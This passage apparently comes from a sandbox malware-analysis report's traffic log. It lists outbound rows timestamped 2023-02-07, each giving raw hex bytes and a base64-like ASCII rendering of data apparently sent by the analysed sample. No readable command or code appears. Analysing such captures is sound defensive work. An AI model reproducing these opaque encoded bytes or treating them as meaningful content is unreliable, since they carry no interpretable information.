                                                                                                                                                                                                              Data Ascii: fmwMAwM0UG3Wni4qYXbTrcqhT3ipXfotF2uiCV3JzlfSLWCSxN6K80OcCwnepCdQS96SGrbh3IhmZoL8ypqVO0qc21lVn5+nKQFuBfbFJJEwQs5cQsWnGQPMmbSz5NfDYL7QVyHDdvAGGyeYEy/5Pkdlbk4b1PKqBtwP18Y0XHnrR0zP78Krm2PFnHoEhtZ9/Pptd3jPgW0rY+zUhVz0Wrnr04eNPM11FtfCL7Q45gEQHo1xAty43xmaEYG1pct
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8108OUTData Raw: 63 34 46 50 61 6e 55 57 6a 31 32 64 6c 2b 36 6d 4a 67 52 55 36 48 6a 75 31 61 67 64 37 78 33 34 45 54 76 72 4c 33 2f 74 44 52 4c 59 5a 5a 2b 4f 4c 63 49 4d 51 59 2b 66 68 68 4d 50 78 47 49 68 50 7a 36 31 64 67 39 62 74 73 6a 48 6b 75 4c 77 30 36 6a 70 36 4a 4a 7a 66 6f 56 73 75 4e 75 51 57 4a 5a 74 53 49 5a 73 36 72 49 34 47 70 76 4c 50 38 2f 6f 76 56 44 74 62 53 6d 65 32 36 37 52 4f 30 39 4b 6d 4a 39 55 6a 6b 47 45 72 78 4b 48 72 45 2b 78 57 72 49 37 6b 74 33 70 75 42 74 4c 32 76 4f 75 6d 7a 47 69 35 6a 6d 4a 65 47 6b 6e 67 54 6c 47 4b 44 31 6c 6a 61 63 5a 78 41 47 72 52 65 7a 64 68 33 59 32 6e 53 73 37 6a 62 6f 4f 6f 35 67 54 46 36 67 51 4f 34 53 55 6e 33 4c 37 55 5a 73 79 4b 52 48 6d 38 78 4d 41 39 70 71 6b 35 66 73 51 33 64 55 30 4f 77 4e 4a 45 49 41
                                                                                                                                                                                                              Data Ascii: c4FPanUWj12dl+6mJgRU6Hju1agd7x34ETvrL3/tDRLYZZ+OLcIMQY+fhhMPxGIhPz61dg9btsjHkuLw06jp6JJzfoVsuNuQWJZtSIZs6rI4GpvLP8/ovVDtbSme267RO09KmJ9UjkGErxKHrE+xWrI7kt3puBtL2vOumzGi5jmJeGkngTlGKD1ljacZxAGrRezdh3Y2nSs7jboOo5gTF6gQO4SUn3L7UZsyKRHm8xMA9pqk5fsQ3dU0OwNJEIA
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8124OUTData Raw: 51 7a 41 4a 5a 33 6e 51 6f 58 31 34 4f 75 52 55 43 6d 6a 46 6f 39 49 77 4c 41 61 74 2f 57 2f 57 54 52 78 77 7a 4d 78 63 57 6b 2f 4b 5a 50 4d 66 35 64 6e 48 74 67 6c 56 35 44 67 7a 33 2b 63 41 7a 38 76 6d 4a 45 6a 53 4d 31 55 64 36 6a 56 4d 56 54 63 61 76 7a 79 56 4b 50 33 2b 4c 54 4e 68 32 42 74 79 6d 2f 6a 77 73 4f 71 50 72 42 38 64 68 38 51 69 68 78 47 65 70 6a 4d 71 58 6a 71 2b 2f 44 61 75 63 2f 50 53 6b 51 33 6a 2b 4c 57 7a 32 39 6d 65 61 49 65 2f 6d 78 72 75 65 36 54 47 44 35 31 52 2f 47 49 77 38 57 35 6b 47 62 70 6d 43 74 64 32 6d 4b 41 6c 77 44 49 6a 57 75 69 49 6f 50 30 6e 76 77 49 6e 64 4d 6f 79 58 47 5a 63 7a 50 6b 59 34 47 52 77 34 48 77 42 67 58 48 36 78 33 53 4a 57 35 50 49 4e 61 63 6b 47 6a 49 63 35 78 36 33 6b 56 7a 68 7a 49 78 56 66 2b 61
                                                                                                                                                                                                              Data Ascii: QzAJZ3nQoX14OuRUCmjFo9IwLAat/W/WTRxwzMxcWk/KZPMf5dnHtglV5Dgz3+cAz8vmJEjSM1Ud6jVMVTcavzyVKP3+LTNh2Btym/jwsOqPrB8dh8QihxGepjMqXjq+/Dauc/PSkQ3j+LWz29meaIe/mxrue6TGD51R/GIw8W5kGbpmCtd2mKAlwDIjWuiIoP0nvwIndMoyXGZczPkY4GRw4HwBgXH6x3SJW5PINackGjIc5x63kVzhzIxVf+a
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8140OUTData Raw: 70 36 67 47 48 73 50 37 6d 4f 4b 41 4d 65 55 44 50 35 70 2b 6c 64 73 64 47 39 2b 54 72 4c 5a 66 31 63 4a 6e 44 34 42 79 42 47 32 30 45 42 54 6b 56 4d 34 2b 4a 39 50 39 4e 70 56 79 34 44 48 47 50 6c 30 72 37 79 55 47 50 31 38 6c 4c 79 55 78 57 73 48 6a 75 2b 45 63 4c 34 5a 65 70 75 6f 4f 65 55 61 32 2f 32 67 52 71 62 79 4e 45 64 4a 56 77 50 69 2b 74 38 65 61 75 38 4e 39 53 6c 5a 65 58 2b 70 5a 78 4d 5a 6d 39 35 4c 4a 42 4f 71 57 6c 77 77 77 39 47 31 71 54 6e 30 57 75 35 39 2b 4e 56 5a 34 70 41 57 2f 6f 6b 33 41 2f 70 77 72 6e 33 58 6b 71 44 70 70 78 4c 64 7a 38 70 4b 45 34 47 59 33 6a 43 51 4c 35 48 75 4c 30 38 6f 6b 61 52 50 48 46 52 78 55 76 51 35 63 68 69 75 4e 42 4d 54 33 6a 71 48 46 30 56 78 4d 62 31 58 37 36 72 30 69 6a 43 4b 33 6a 4e 64 73 62 46 61
                                                                                                                                                                                                              Data Ascii: p6gGHsP7mOKAMeUDP5p+ldsdG9+TrLZf1cJnD4ByBG20EBTkVM4+J9P9NpVy4DHGPl0r7yUGP18lLyUxWsHju+EcL4ZepuoOeUa2/2gRqbyNEdJVwPi+t8eau8N9SlZeX+pZxMZm95LJBOqWlwww9G1qTn0Wu59+NVZ4pAW/ok3A/pwrn3XkqDppxLdz8pKE4GY3jCQL5HuL08okaRPHFRxUvQ5chiuNBMT3jqHF0VxMb1X76r0ijCK3jNdsbFa
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8156OUTData Raw: 49 52 71 54 61 72 64 45 4f 65 4a 4f 52 47 45 46 51 5a 52 34 69 46 67 43 79 52 75 32 63 33 6d 68 78 39 54 42 6a 38 32 6a 50 45 36 69 38 58 2f 6f 43 53 66 5a 35 44 49 71 50 34 4f 74 6d 4e 6e 51 4b 59 72 70 67 54 31 63 48 33 6b 75 65 65 31 31 79 70 30 57 43 4a 58 63 6a 76 44 6e 6f 7a 64 6b 55 2f 51 36 6c 49 30 58 6d 56 73 57 67 7a 4f 75 75 69 33 76 48 6e 53 4e 55 41 73 49 69 43 44 43 52 65 67 55 4f 75 4c 79 56 5a 46 79 73 61 59 63 49 6c 2f 39 7a 66 57 49 75 43 67 76 48 6c 7a 71 6a 6d 50 46 73 48 30 43 34 71 68 4e 4e 30 43 38 4d 4a 36 53 4e 55 4c 42 2b 70 64 4d 4f 6f 4d 72 2b 2f 41 31 2b 30 68 56 51 6e 41 53 79 69 48 68 6b 36 6a 70 78 2f 6d 56 59 66 5a 6f 31 2f 59 76 57 7a 6b 41 2b 67 45 76 56 61 74 2b 34 41 6c 48 63 38 33 58 38 39 53 4a 64 46 50 72 54 71 55
                                                                                                                                                                                                              Data Ascii: IRqTardEOeJORGEFQZR4iFgCyRu2c3mhx9TBj82jPE6i8X/oCSfZ5DIqP4OtmNnQKYrpgT1cH3kuee11yp0WCJXcjvDnozdkU/Q6lI0XmVsWgzOuui3vHnSNUAsIiCDCRegUOuLyVZFysaYcIl/9zfWIuCgvHlzqjmPFsH0C4qhNN0C8MJ6SNULB+pdMOoMr+/A1+0hVQnASyiHhk6jpx/mVYfZo1/YvWzkA+gEvVat+4AlHc83X89SJdFPrTqU
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8172OUTData Raw: 48 6b 53 51 47 37 64 6e 2f 42 55 72 4d 43 6a 46 79 65 39 30 57 5a 6e 37 6d 61 4f 34 79 41 45 67 52 62 64 50 4f 6c 39 57 6b 54 4b 41 67 57 2b 4e 6a 61 54 32 33 45 42 39 71 41 37 30 39 39 34 6a 61 6f 53 71 6e 47 78 76 5a 59 75 6a 6d 43 77 6b 68 73 67 76 51 6c 37 34 73 55 76 50 54 37 46 35 5a 53 69 50 57 35 49 77 74 5a 62 69 35 37 71 6b 79 6d 34 36 79 56 35 6c 7a 52 61 61 6f 34 68 46 34 6f 2f 59 71 49 57 48 78 30 31 50 46 4d 47 71 74 6a 4c 46 6d 52 59 62 66 5a 69 73 63 4d 6c 46 4c 65 32 6e 52 49 30 32 46 51 72 4f 41 74 70 6c 46 62 55 46 50 31 75 2f 4b 36 62 48 6b 58 58 4f 61 43 42 42 4e 6d 44 50 61 38 37 62 59 59 48 62 74 39 31 75 4f 77 39 75 2b 30 62 2f 39 37 77 72 51 71 36 54 79 77 57 6f 51 45 69 2f 6c 48 4b 56 53 7a 6a 48 68 6d 70 77 61 4a 52 45 74 55 7a
                                                                                                                                                                                                              Data Ascii: HkSQG7dn/BUrMCjFye90WZn7maO4yAEgRbdPOl9WkTKAgW+NjaT23EB9qA70994jaoSqnGxvZYujmCwkhsgvQl74sUvPT7F5ZSiPW5IwtZbi57qkym46yV5lzRaao4hF4o/YqIWHx01PFMGqtjLFmRYbfZiscMlFLe2nRI02FQrOAtplFbUFP1u/K6bHkXXOaCBBNmDPa87bYYHbt91uOw9u+0b/97wrQq6TywWoQEi/lHKVSzjHhmpwaJREtUz
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8188OUTData Raw: 55 52 76 42 49 6e 71 67 34 31 46 38 43 71 4f 67 65 4c 64 32 53 4f 6b 63 76 30 44 43 4b 53 77 6a 70 30 4d 6f 4f 6c 39 42 7a 72 65 6d 52 75 6d 4a 31 53 47 76 6a 2f 65 77 52 73 44 39 30 62 42 6e 46 30 52 76 4b 75 62 77 76 61 46 2b 41 69 51 4e 46 49 72 6d 54 33 4f 38 79 36 57 77 2f 48 36 77 4b 45 53 72 63 73 34 4e 79 4e 6b 4d 4f 38 75 55 71 6e 66 43 49 74 4e 72 6d 4e 43 45 75 4e 45 6d 6a 44 44 31 39 61 50 49 32 7a 71 78 37 37 62 37 38 6f 74 6d 65 38 49 41 78 62 57 50 46 43 49 44 53 43 66 63 53 50 35 6d 53 31 35 6e 4e 62 6c 47 69 2b 52 38 35 48 53 4c 66 41 4e 7a 35 45 43 30 76 4c 71 34 36 4a 4c 46 45 34 77 66 44 44 4f 69 74 32 65 64 77 68 55 33 65 30 31 31 78 2b 66 6a 5a 73 41 74 4d 58 48 6b 79 61 44 35 4a 6c 6f 55 65 39 7a 5a 4b 68 38 6c 38 46 59 2b 65 2f 48
                                                                                                                                                                                                              Data Ascii: URvBInqg41F8CqOgeLd2SOkcv0DCKSwjp0MoOl9BzremRumJ1SGvj/ewRsD90bBnF0RvKubwvaF+AiQNFIrmT3O8y6Ww/H6wKESrcs4NyNkMO8uUqnfCItNrmNCEuNEmjDD19aPI2zqx77b78otme8IAxbWPFCIDSCfcSP5mS15nNblGi+R85HSLfANz5EC0vLq46JLFE4wfDDOit2edwhU3e011x+fjZsAtMXHkyaD5JloUe9zZKh8l8FY+e/H
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8204OUTData Raw: 44 64 6e 4e 6d 38 64 6e 48 33 61 2b 2f 2f 6e 55 51 71 73 61 41 69 46 71 2b 66 50 46 72 50 4e 71 6a 6e 6c 65 52 4c 31 6d 71 6c 58 4b 54 46 6d 6d 67 78 35 45 68 77 48 35 44 6b 51 77 38 2b 50 4d 39 31 49 4f 6c 73 63 52 36 4c 62 42 72 6e 4f 31 48 55 30 34 69 4f 39 2b 2f 75 48 77 5a 4a 50 4a 66 53 7a 2b 41 67 6c 54 71 56 43 51 4b 47 49 65 34 2b 61 57 75 63 51 77 76 47 4b 55 2f 52 38 67 46 57 57 5a 69 61 59 4c 6f 63 36 38 33 51 2b 49 38 54 45 6b 39 79 73 69 56 5a 34 63 6b 58 66 69 6b 5a 48 4c 74 4f 6b 62 49 49 34 6b 37 64 73 4d 4d 6b 4d 61 52 6b 64 56 57 6d 4e 43 4e 63 61 69 65 36 52 70 73 42 69 2f 30 44 76 71 56 47 2b 61 43 47 55 36 72 72 2f 4c 4e 34 70 6c 53 32 39 79 36 48 31 38 5a 46 6f 35 6f 6c 38 32 61 73 38 65 6a 4d 38 4e 72 42 76 54 76 6b 66 2f 6f 31 34
                                                                                                                                                                                                              Data Ascii: DdnNm8dnH3a+//nUQqsaAiFq+fPFrPNqjnleRL1mqlXKTFmmgx5EhwH5DkQw8+PM91IOlscR6LbBrnO1HU04iO9+/uHwZJPJfSz+AglTqVCQKGIe4+aWucQwvGKU/R8gFWWZiaYLoc683Q+I8TEk9ysiVZ4ckXfikZHLtOkbII4k7dsMMkMaRkdVWmNCNcaie6RpsBi/0DvqVG+aCGU6rr/LN4plS29y6H18ZFo5ol82as8ejM8NrBvTvkf/o14
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8220OUTData Raw: 66 62 4e 39 35 4a 63 52 4a 61 32 35 75 39 48 59 30 63 50 57 5a 41 2f 4d 6b 75 41 53 34 44 54 44 30 6d 56 50 55 42 48 74 62 33 55 48 39 43 64 2b 70 6a 75 6f 45 68 42 58 58 61 42 51 31 49 38 55 39 47 52 6b 43 74 6d 6b 6b 53 6b 72 34 55 61 63 34 63 43 31 2b 30 4c 76 41 76 62 39 65 5a 74 7a 50 72 39 31 4f 75 7a 31 69 64 4d 48 35 67 72 6e 5a 46 6e 57 73 76 63 63 30 48 35 54 4e 42 55 72 7a 76 74 62 32 56 68 61 39 51 71 32 56 57 45 58 39 55 37 76 30 75 63 6d 78 6d 41 46 4a 37 6a 6a 65 36 4e 76 34 54 38 33 4f 41 2f 77 78 50 53 45 34 51 2b 49 78 73 4f 66 79 66 49 76 36 5a 58 73 6f 32 57 4c 2b 45 75 72 70 56 33 6e 4b 52 4e 4e 63 37 2f 2f 2b 76 52 72 64 51 6c 51 50 39 79 4d 44 62 4c 59 50 41 4a 51 43 58 4d 74 2b 30 59 74 59 62 53 54 77 43 52 62 6e 4a 6e 72 44 45 2b
                                                                                                                                                                                                              Data Ascii: fbN95JcRJa25u9HY0cPWZA/MkuAS4DTD0mVPUBHtb3UH9Cd+pjuoEhBXXaBQ1I8U9GRkCtmkkSkr4Uac4cC1+0LvAvb9eZtzPr91Ouz1idMH5grnZFnWsvcc0H5TNBUrzvtb2Vha9Qq2VWEX9U7v0ucmxmAFJ7jje6Nv4T83OA/wxPSE4Q+IxsOfyfIv6ZXso2WL+EurpV3nKRNNc7//+vRrdQlQP9yMDbLYPAJQCXMt+0YtYbSTwCRbnJnrDE+
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8236OUTData Raw: 68 66 6b 45 36 6b 42 54 61 46 78 65 51 4e 30 2b 57 4e 37 53 4f 74 6b 61 34 33 4b 44 4a 30 58 47 6e 66 6c 6c 30 45 35 75 2b 6e 4c 48 68 63 66 51 59 4a 67 4e 37 6f 47 6a 4c 56 38 77 51 7a 30 6b 65 69 63 42 51 37 77 59 6c 73 35 4a 44 49 52 4e 5a 7a 7a 36 57 66 4b 46 71 44 53 31 71 7a 42 70 6f 33 64 67 49 41 78 4b 36 6b 2b 65 69 63 6f 31 6b 41 43 36 65 64 34 32 6a 64 2b 2f 35 39 5a 34 58 77 63 38 35 64 79 68 2b 62 5a 35 4b 44 43 37 52 31 6a 6c 4a 35 62 42 59 78 4a 61 53 30 66 35 2b 39 69 59 43 65 73 57 69 64 33 52 7a 69 55 2f 34 6e 49 30 6f 33 2b 33 56 4d 6f 34 6c 6e 67 6b 76 58 7a 45 37 79 2b 63 41 63 77 78 62 78 50 6a 54 6f 5a 61 54 71 5a 6c 34 37 72 67 34 38 69 2b 44 55 58 6d 44 51 59 34 45 58 2b 51 74 6b 6e 59 50 65 62 7a 66 66 39 59 58 5a 65 4e 62 48 4c
                                                                                                                                                                                                              Data Ascii: hfkE6kBTaFxeQN0+WN7SOtka43KDJ0XGnfll0E5u+nLHhcfQYJgN7oGjLV8wQz0keicBQ7wYls5JDIRNZzz6WfKFqDS1qzBpo3dgIAxK6k+eico1kAC6ed42jd+/59Z4Xwc85dyh+bZ5KDC7R1jlJ5bBYxJaS0f5+9iYCesWid3RziU/4nI0o3+3VMo4lngkvXzE7y+cAcwxbxPjToZaTqZl47rg48i+DUXmDQY4EX+QtknYPebzff9YXZeNbHL
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8252OUTData Raw: 4e 49 35 30 33 6a 35 38 49 46 78 76 48 46 30 49 4e 63 52 51 6f 45 70 4b 53 51 44 67 32 62 36 74 78 74 70 6c 62 56 56 75 59 68 6b 39 37 2f 33 78 6c 75 4f 54 41 41 44 32 79 55 51 30 46 58 76 6b 33 69 71 31 49 45 2b 2f 52 4b 50 6c 39 44 55 78 44 4f 70 4e 35 62 2b 4e 4c 5a 47 54 61 39 43 68 2f 72 32 4c 75 65 50 6d 45 53 2f 35 45 38 38 6f 36 67 48 31 30 4c 44 58 45 50 70 58 56 32 61 4c 4b 39 6d 30 38 75 2f 38 47 55 48 74 5a 52 36 67 61 47 66 6d 41 54 6b 38 36 4b 41 6a 64 69 33 62 64 52 72 37 48 33 2b 62 63 46 6b 63 39 42 79 37 65 5a 33 6d 69 51 6e 63 66 44 39 76 32 34 32 4c 72 33 76 65 5a 47 48 32 72 71 79 6d 50 75 59 42 59 38 2f 43 79 79 39 30 4e 4d 47 53 6b 77 76 76 4c 4c 46 37 55 65 34 67 58 78 51 57 79 6a 4e 47 6b 74 6a 59 69 36 4b 35 44 72 56 59 6c 50 62
                                                                                                                                                                                                              Data Ascii: NI503j58IFxvHF0INcRQoEpKSQDg2b6txtplbVVuYhk97/3xluOTAAD2yUQ0FXvk3iq1IE+/RKPl9DUxDOpN5b+NLZGTa9Ch/r2LuePmES/5E88o6gH10LDXEPpXV2aLK9m08u/8GUHtZR6gaGfmATk86KAjdi3bdRr7H3+bcFkc9By7eZ3miQncfD9v242Lr3veZGH2rqymPuYBY8/Cyy90NMGSkwvvLLF7Ue4gXxQWyjNGktjYi6K5DrVYlPb
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8268OUTData Raw: 52 79 68 51 65 41 4c 38 69 53 49 48 6c 7a 55 57 68 46 42 39 76 44 62 6d 38 51 75 37 4d 58 5a 68 33 63 2b 38 4e 4e 2f 4d 52 65 7a 2b 52 38 4b 7a 35 68 4c 53 49 73 64 7a 6b 54 51 2f 48 62 45 6a 62 47 63 33 44 2f 79 71 71 79 43 31 4e 6e 74 41 43 33 66 54 4b 78 4e 34 62 36 78 54 41 50 6e 56 41 73 52 71 59 78 56 7a 5a 67 73 48 44 33 36 32 59 2b 42 36 47 4a 71 76 79 49 70 73 5a 69 5a 6f 47 66 4b 67 46 7a 4c 6e 63 76 55 78 77 54 36 67 4b 31 2f 70 56 4b 31 36 35 62 6d 58 6f 35 4e 57 35 34 68 4c 53 61 55 47 6d 66 4f 77 74 69 68 77 52 36 32 36 58 64 31 6d 66 6f 45 31 48 2f 64 33 43 47 6e 75 49 78 71 2b 66 66 71 61 6b 59 47 4e 73 66 67 76 72 62 2f 52 44 46 6b 70 56 64 64 70 61 77 30 55 56 6e 66 50 5a 45 39 56 63 45 32 33 47 65 79 48 43 48 32 38 43 31 78 62 54 63 63
                                                                                                                                                                                                              Data Ascii: RyhQeAL8iSIHlzUWhFB9vDbm8Qu7MXZh3c+8NN/MRez+R8Kz5hLSIsdzkTQ/HbEjbGc3D/yqqyC1NntAC3fTKxN4b6xTAPnVAsRqYxVzZgsHD362Y+B6GJqvyIpsZiZoGfKgFzLncvUxwT6gK1/pVK165bmXo5NW54hLSaUGmfOwtihwR626Xd1mfoE1H/d3CGnuIxq+ffqakYGNsfgvrb/RDFkpVddpaw0UVnfPZE9VcE23GeyHCH28C1xbTcc
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8284OUTData Raw: 50 54 4a 62 2f 4e 43 4e 4d 33 4a 47 49 65 77 6b 50 61 6b 68 2b 53 62 59 74 4a 38 58 37 49 68 6f 6b 2f 67 77 64 37 38 77 73 73 47 51 53 41 2b 34 2b 76 66 4a 4d 51 72 46 48 62 50 61 71 70 68 75 54 64 70 6a 6a 4c 2b 54 78 6f 62 30 59 63 33 36 72 51 43 4b 74 59 48 72 6d 48 63 59 48 55 77 4b 6d 67 38 50 66 4a 78 30 2b 66 56 42 44 43 55 79 59 50 4d 2b 32 72 2f 66 46 6c 57 4d 50 59 66 71 75 72 35 45 61 45 43 41 32 38 39 66 74 41 50 76 62 46 75 76 36 4c 35 74 43 30 34 35 57 42 78 4a 6c 74 34 41 55 56 5a 4b 73 44 36 41 52 42 58 64 54 35 6c 43 30 48 4f 34 74 76 31 44 4a 43 79 51 52 66 55 57 62 64 71 64 48 6e 56 75 6a 37 58 66 41 76 74 58 53 69 6f 50 55 39 33 6f 6a 2f 4a 56 43 32 2f 36 74 65 69 2b 56 63 71 31 4f 77 48 6b 59 6b 55 7a 70 4d 75 6e 56 51 45 52 4a 36 31
                                                                                                                                                                                                              Data Ascii: PTJb/NCNM3JGIewkPakh+SbYtJ8X7Ihok/gwd78wssGQSA+4+vfJMQrFHbPaqphuTdpjjL+Txob0Yc36rQCKtYHrmHcYHUwKmg8PfJx0+fVBDCUyYPM+2r/fFlWMPYfqur5EaECA289ftAPvbFuv6L5tC045WBxJlt4AUVZKsD6ARBXdT5lC0HO4tv1DJCyQRfUWbdqdHnVuj7XfAvtXSioPU93oj/JVC2/6tei+Vcq1OwHkYkUzpMunVQERJ61
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8300OUTData Raw: 46 78 38 33 67 70 62 77 6c 75 46 65 74 6e 58 2f 5a 56 5a 66 63 46 70 46 57 7a 42 36 70 32 4e 47 6a 4c 69 75 36 45 32 59 46 57 44 54 42 76 53 50 55 7a 65 49 62 4e 2f 47 61 6d 6e 51 76 62 72 33 30 30 4b 2b 4b 69 52 38 4b 51 6b 66 64 42 48 4b 64 4b 57 56 47 67 53 35 62 39 70 44 6b 39 67 46 62 64 4a 62 6b 59 37 33 44 50 52 71 58 43 54 68 37 52 68 6c 48 55 7a 66 2f 68 76 6d 33 51 65 34 79 66 37 43 69 30 53 61 54 47 74 70 35 78 34 46 36 6c 30 50 76 51 50 67 6b 48 55 47 65 4b 71 37 45 41 4e 6d 4a 59 45 6d 79 68 79 64 4d 30 56 77 52 69 52 6b 54 61 6a 4c 33 61 2b 42 33 32 4e 45 4e 55 65 67 72 63 58 34 30 55 65 73 41 46 33 50 77 59 6d 51 2f 77 51 43 55 35 6e 79 72 64 78 38 55 6d 34 2b 67 34 70 48 53 66 55 6c 6b 4e 76 31 6a 53 63 76 4f 75 4a 6f 79 38 56 6d 42 41 4d
                                                                                                                                                                                                              Data Ascii: Fx83gpbwluFetnX/ZVZfcFpFWzB6p2NGjLiu6E2YFWDTBvSPUzeIbN/GamnQvbr300K+KiR8KQkfdBHKdKWVGgS5b9pDk9gFbdJbkY73DPRqXCTh7RhlHUzf/hvm3Qe4yf7Ci0SaTGtp5x4F6l0PvQPgkHUGeKq7EANmJYEmyhydM0VwRiRkTajL3a+B32NENUegrcX40UesAF3PwYmQ/wQCU5nyrdx8Um4+g4pHSfUlkNv1jScvOuJoy8VmBAM
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8316OUTData Raw: 74 37 4b 35 2f 59 6a 68 31 63 53 58 37 62 4f 69 78 74 6a 50 68 36 35 67 6d 4f 6f 70 79 75 78 5a 48 6e 58 4f 6a 57 51 58 41 53 6d 56 45 30 66 7a 6b 61 54 6e 4d 7a 55 62 52 49 37 51 71 6f 63 6a 2b 68 4b 33 73 57 44 6f 32 52 62 47 6e 69 74 50 79 69 61 35 74 52 62 37 41 6d 65 4f 4d 42 52 42 4e 47 72 6c 68 35 72 6f 4d 4a 75 58 57 46 76 33 49 77 77 74 6c 77 63 77 56 57 53 51 43 52 62 70 52 63 34 68 36 52 41 52 78 62 36 4b 32 4e 4d 64 6d 57 6d 64 36 61 62 37 37 6b 6e 64 6d 61 58 73 72 76 50 42 70 6b 4a 44 4e 4f 76 37 32 57 41 6f 72 38 34 52 5a 35 50 6c 34 2b 56 74 64 6a 32 38 54 46 2b 62 42 76 33 54 58 59 32 50 4f 55 64 2b 32 67 37 33 37 2f 5a 73 41 73 4e 67 7a 68 77 49 50 30 54 49 71 36 57 6c 79 50 38 67 4b 33 69 33 49 76 32 64 4e 49 45 63 59 74 50 44 31 49 65
                                                                                                                                                                                                              Data Ascii: t7K5/Yjh1cSX7bOixtjPh65gmOopyuxZHnXOjWQXASmVE0fzkaTnMzUbRI7Qqocj+hK3sWDo2RbGnitPyia5tRb7AmeOMBRBNGrlh5roMJuXWFv3IwwtlwcwVWSQCRbpRc4h6RARxb6K2NMdmWmd6ab77kndmaXsrvPBpkJDNOv72WAor84RZ5Pl4+Vtdj28TF+bBv3TXY2POUd+2g737/ZsAsNgzhwIP0TIq6WlyP8gK3i3Iv2dNIEcYtPD1Ie
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8332OUTData Raw: 45 79 6e 71 2f 6a 72 74 32 6c 78 70 63 72 30 46 44 35 65 4c 56 33 4f 67 4b 72 4e 4f 4e 4b 47 77 34 2f 44 44 70 65 64 4d 63 75 73 51 31 32 72 59 2b 4f 56 50 35 78 6c 37 44 68 43 69 6c 51 79 44 46 6d 6c 4c 57 6c 36 4d 33 77 6f 36 4a 41 6d 6b 36 6b 72 49 71 6e 72 38 47 76 41 37 6c 4b 6b 62 68 65 6a 4b 41 74 51 73 79 37 52 33 2b 43 72 41 36 38 43 72 31 33 61 74 71 5a 43 51 72 67 6e 35 47 2f 57 63 4f 47 67 4d 73 77 68 6c 73 38 6a 66 31 39 6c 71 35 56 4a 46 2b 41 43 38 75 32 78 57 48 54 54 6e 39 53 55 56 36 53 61 37 59 32 4a 55 58 31 68 4d 62 63 2b 6e 78 69 47 57 38 53 7a 6e 6a 64 42 49 6a 2b 58 69 58 4c 79 70 39 42 51 65 61 2b 6d 52 2f 62 79 59 74 69 75 6a 72 35 50 42 47 55 49 63 65 42 44 2b 32 2b 5a 65 54 61 64 6f 39 6d 42 32 62 4d 37 43 54 52 4d 66 6f 31 64
                                                                                                                                                                                                              Data Ascii: Eynq/jrt2lxpcr0FD5eLV3OgKrNONKGw4/DDpedMcusQ12rY+OVP5xl7DhCilQyDFmlLWl6M3wo6JAmk6krIqnr8GvA7lKkbhejKAtQsy7R3+CrA68Cr13atqZCQrgn5G/WcOGgMswhls8jf19lq5VJF+AC8u2xWHTTn9SUV6Sa7Y2JUX1hMbc+nxiGW8SznjdBIj+XiXLyp9BQea+mR/byYtiujr5PBGUIceBD+2+ZeTado9mB2bM7CTRMfo1d
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8348OUTData Raw: 44 75 4a 42 33 67 51 43 63 6c 6c 76 70 4d 52 72 56 37 55 66 4c 2f 64 39 4a 75 56 50 32 64 6c 69 37 2f 56 36 66 78 56 58 77 75 52 6f 76 6b 71 54 35 74 57 6f 5a 35 6d 4a 4c 6b 6c 63 58 35 38 68 58 4d 64 45 46 63 59 37 78 34 62 37 4d 4d 2f 63 6c 54 54 6b 58 46 33 63 37 70 49 72 51 31 7a 68 47 55 58 73 52 2b 54 4e 4b 42 45 33 6d 6b 71 4c 74 6c 63 6c 45 41 7a 35 38 72 75 52 6b 4b 2b 67 31 6b 44 75 73 4b 42 6c 4a 6f 39 75 48 4b 7a 34 79 6e 2b 42 72 72 4c 69 59 43 30 46 52 61 49 67 62 72 6d 36 46 4e 44 4e 4b 64 4b 6f 77 4d 4a 58 39 4b 6c 75 35 77 54 52 64 6b 6e 7a 38 49 44 76 53 50 30 69 71 72 65 42 37 6b 78 36 76 35 76 41 54 37 48 7a 4d 52 38 37 71 4c 66 71 5a 45 34 52 57 2f 58 7a 68 75 69 52 55 49 35 6b 55 4b 6c 66 6b 4f 32 6e 42 72 4d 50 78 61 54 47 67 4f 58
                                                                                                                                                                                                              Data Ascii: DuJB3gQCcllvpMRrV7UfL/d9JuVP2dli7/V6fxVXwuRovkqT5tWoZ5mJLklcX58hXMdEFcY7x4b7MM/clTTkXF3c7pIrQ1zhGUXsR+TNKBE3mkqLtlclEAz58ruRkK+g1kDusKBlJo9uHKz4yn+BrrLiYC0FRaIgbrm6FNDNKdKowMJX9Klu5wTRdknz8IDvSP0iqreB7kx6v5vAT7HzMR87qLfqZE4RW/XzhuiRUI5kUKlfkO2nBrMPxaTGgOX
                                                                                                                                                                                                              2023-02-07 18:52:30 UTC8364OUTData Raw: 54 68 38 47 62 47 38 76 76 59 30 4f 35 6b 6e 46 6e 64 37 43 72 31 31 49 77 74 77 71 54 55 78 59 35 62 6e 66 51 51 4e 4a 57 75 43 7a 6f 4a 66 71 51 77 4d 6e 73 72 78 5a 64 49 42 64 54 75 73 34 73 46 30 47 6c 2f 52 31 56 6c 2b 7a 34 64 53 30 77 6a 6f 2f 73 68 4c 71 45 4f 63 76 4c 73 4b 76 56 4a 61 46 6c 59 6f 69 76 38 59 59 59 47 6e 65 44 47 68 46 70 30 2b 55 42 35 4d 7a 78 36 77 50 65 71 6f 73 4d 56 35 73 30 77 66 4e 64 77 59 69 4a 62 73 51 41 44 48 72 58 73 50 2b 72 51 66 49 5a 32 6b 58 47 7a 35 74 6e 2b 4d 6e 6d 46 52 6d 30 61 4a 4f 4e 67 54 4a 4c 32 58 53 47 48 6b 55 54 75 76 64 50 55 69 78 45 43 4d 55 71 78 52 50 59 4e 46 46 42 6f 65 63 59 56 74 65 4e 48 65 67 69 66 43 77 42 46 65 2f 36 38 4b 6e 63 78 65 2f 32 39 71 33 48 49 6e 2b 63 6f 64 43 44 63 70
